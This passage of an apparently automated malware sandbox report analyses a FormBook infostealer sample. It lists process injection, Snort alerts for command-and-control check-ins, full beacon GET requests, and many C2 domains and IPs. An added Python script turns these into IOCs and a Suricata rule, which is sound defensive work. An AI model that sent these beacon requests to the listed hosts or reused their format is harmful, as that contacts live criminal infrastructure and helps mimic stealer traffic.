chkdsk.exe, 0000000D.00000002.2618280438.0000000005760000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2613575726.00000000053F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000003.00000003.2320149761.000000000530E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E79E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2318073446.0000000005151000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2389849761.00000000046CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2387898399.0000000004512000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004870000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2580553834.000000000474F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E340000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2578529137.0000000004596000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E4DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2615483603.00000000055AC000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.00000000058FE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.0000000005760000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2613575726.00000000053F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: colorcpl.exe, 00000003.00000002.2388060963.00000000053F0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2386689890.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4615286421.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: rundll32.pdbGCTL source: colorcpl.exe, 00000003.00000002.2388060963.00000000053F0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2386689890.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4615286421.0000000000C00000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_032B5C18 GetModuleHandleA, GetProcAddress, lstrcpynA, lstrcpynA, lstrcpynA, FindFirstFileA, FindClose, lstrlenA, lstrcpynA, lstrlenA, lstrcpynA
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop esi 3_2_068C72DC

              Networking

Source: C:\Windows\explorer.exe | Network Connect: 37.97.254.27 80
Source: C:\Windows\explorer.exe | Network Connect: 62.72.50.88 80
Source: C:\Windows\explorer.exe | Network Connect: 156.237.159.158 80
Source: C:\Windows\explorer.exe | Network Connect: 104.140.89.24 80
Source: C:\Windows\explorer.exe | Network Connect: 104.247.81.50 80
Source: C:\Windows\explorer.exe | Network Connect: 34.93.103.39 80
Source: C:\Windows\explorer.exe | Network Connect: 3.33.130.190 80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.93.103.39:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49749 -> 104.140.89.24:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 3.33.130.190:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49751 -> 104.247.81.50:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 37.97.254.27:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 62.72.50.88:80
Source: Malware configuration extractor | URLs: www.hivaom.top/ao65/
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.leathfortexas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.optimusvisionlb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.maltsky.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=1+k7ryNQzoPRnNssVcxEVGqYVXcpdNYnwR6YaRuf8QIEqfcPbXX6k2BVupn8sj0YeeXTfXT4xQ==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.thnkotb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.harmonicod.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.kermisbedrijfkramer.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.stellarskyline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP HTTP/1.1Host: www.hivaom.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
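The eight check-in requests listed above share one path, one parameter layout and one constant second parameter; only the first parameter's base64 value changes per host. The script below is an added example, not part of the Joe Sandbox report: it parses those requests (copied from the report rows into OBSERVED), derives the blockable host/path IOCs, checks the shape of the request, and renders an illustrative Suricata rule pinned to the constant URI parts. The tuple layout, the function names and the emitted rule are this script's own; the report ships no rule.

```python
"""Turn the FormBook check-in rows into IOCs and a narrow detection rule.

Added example, not part of the Joe Sandbox report. OBSERVED is copied
from the report's "HTTP traffic detected" rows (Host header, request
target); the body shown for every row is the same seven-byte value.
"""
from __future__ import annotations

import base64

# Constructed from the report rows: (Host header, request-target).
OBSERVED = [
    ("www.leathfortexas.com", "/ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP"),
    ("www.optimusvisionlb.com", "/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP"),
    ("www.maltsky.net", "/ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP"),
    ("www.thnkotb.com", "/ao65/?3f94p=1+k7ryNQzoPRnNssVcxEVGqYVXcpdNYnwR6YaRuf8QIEqfcPbXX6k2BVupn8sj0YeeXTfXT4xQ==&ojq4i=mFNh5n78I22D3DgP"),
    ("www.harmonicod.com", "/ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP"),
    ("www.kermisbedrijfkramer.online", "/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP"),
    ("www.stellarskyline.com", "/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP"),
    ("www.hivaom.top", "/ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP"),
]
RAW_BODY_HEX = "00 00 00 00 00 00 00"  # "Data Raw" column, identical on every row


def split_query(target: str) -> tuple[str, dict[str, str]]:
    """Split a request-target into path and an ordered name->value map.

    Done by hand instead of urllib.parse.parse_qs: parse_qs would turn the
    '+' characters inside the base64 payload into spaces.
    """
    path, _, query = target.partition("?")
    params: dict[str, str] = {}
    for kv in query.split("&"):
        name, _, value = kv.partition("=")
        params[name] = value
    return path, params


def summarize(observed=OBSERVED, body_hex: str = RAW_BODY_HEX) -> dict:
    """Reduce the observed requests to the invariants a detection can key on."""
    parsed = [(host, *split_query(target)) for host, target in observed]
    paths = {path for _, path, _ in parsed}
    layouts = {tuple(params) for _, _, params in parsed}
    if len(paths) != 1 or len(layouts) != 1:
        raise ValueError("rows do not share a single path / parameter layout")
    order = list(layouts.pop())
    constant = [n for n in order if len({p[n] for _, _, p in parsed}) == 1]
    varying = [n for n in order if n not in constant]
    body = bytes.fromhex(body_hex)
    # validate=True rejects anything outside the standard base64 alphabet.
    decoded = {len(base64.b64decode(p[n], validate=True)) for _, _, p in parsed for n in varying}
    return {
        "hosts": [host for host, _, _ in parsed],
        "c2_path": paths.pop(),
        "param_order": order,
        "constant_params": {n: parsed[0][2][n] for n in constant},
        "varying_params": varying,
        "varying_decoded_lengths": sorted(decoded),
        "body_is_nul_padding": len(body) > 0 and set(body) == {0},
    }


def ioc_lines(summary: dict) -> list[str]:
    """host + path pairs, the form most blocklists take."""
    return [f"{h}{summary['c2_path']}" for h in summary["hosts"]]


def suricata_rule(summary: dict, sid: int) -> str:
    """Illustrative rule: pin the path plus first parameter name at the start
    of the URI and the constant second parameter at its end. Assumes the
    constant parameter is campaign-specific, so the rule is deliberately narrow."""
    first = summary["param_order"][0]
    head = f"{summary['c2_path']}?{first}="
    tail = "".join(f"&{n}={v}" for n, v in summary["constant_params"].items())
    return (
        f'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"FormBook check-in '
        f'{summary["c2_path"]}"; flow:established,to_server; http.method; content:"GET"; '
        f'http.uri; content:"{head}"; startswith; content:"{tail}"; endswith; '
        f'classtype:trojan-activity; sid:{sid}; rev:1;)'
    )


if __name__ == "__main__":
    s = summarize()
    print("\n".join(ioc_lines(s)))
    print(suricata_rule(s, 1000001))
```

The decoded length of the varying parameter (55 bytes on every row here) is worth recording alongside the rule: if a later sample keeps the path and the constant parameter but the payload length changes, the rule still fires and the length tells you the beacon format moved.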
Source: Joe Sandbox View | ASN Name: TRANSIP-AS Amsterdam the Netherlands NL
Source: Joe Sandbox View | ASN Name: TEAMINTERNET-CA-AS CA
Source: Joe Sandbox View | ASN Name: PRTL-DE
Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe | Code function: 0_2_0330BB50 InternetCheckConnectionA, 0_2_0330BB50
Source: Joe Sandbox View | IP Address: 37.97.254.27
Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000005.00000000.2331503846.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2331530357.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2324920937.00000000028A0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.1techtrendzstore.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.1techtrendzstore.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.website
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.1techtrendzstore.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.canwealljustagree.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.canwealljustagree.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.canwealljustagree.com/ao65/www.ecofare.xyz
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.canwealljustagree.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ecofare.xyz
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ecofare.xyz/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ecofare.xyz/ao65/www.iokgw1.top
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ecofare.xyzReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.harmonicod.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.harmonicod.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.harmonicod.com/ao65/www.kermisbedrijfkramer.online
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.harmonicod.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hivaom.top
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hivaom.top/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hivaom.top/ao65/www.canwealljustagree.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hivaom.topReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.iokgw1.top
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.iokgw1.top/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.iokgw1.top/ao65/www.1techtrendzstore.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.iokgw1.topReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kermisbedrijfkramer.online
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kermisbedrijfkramer.online/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kermisbedrijfkramer.onlineReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kuis-raja-borong.website
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kuis-raja-borong.website/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kuis-raja-borong.website/ao65/www.oaistetic.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.kuis-raja-borong.websiteReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.leathfortexas.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.leathfortexas.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.leathfortexas.com/ao65/www.ouxodb001.cfd
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.leathfortexas.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.maltsky.net
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.maltsky.net/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.maltsky.net/ao65/www.thnkotb.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.maltsky.netReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.oaistetic.com
Source: explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.oaistetic.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.oaistetic.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.optimusvisionlb.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.optimusvisionlb.com/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.optimusvisionlb.com/ao65/www.maltsky.net
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.optimusvisionlb.comReferer:
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ouxodb001.cfd
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ouxodb001.cfd/ao65/
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ouxodb001.cfdReferer:
Source: Fpopgapwdcgvxn.exe, Fpopgapwdcgvxn.exe, 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2322773738.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000002.2582481668.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2688350100.00000000029C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com
Source: explorer.exe, 00000005.00000003.2979477357.000000000C521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4632180763.000000000C50D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sprockettrucking.com
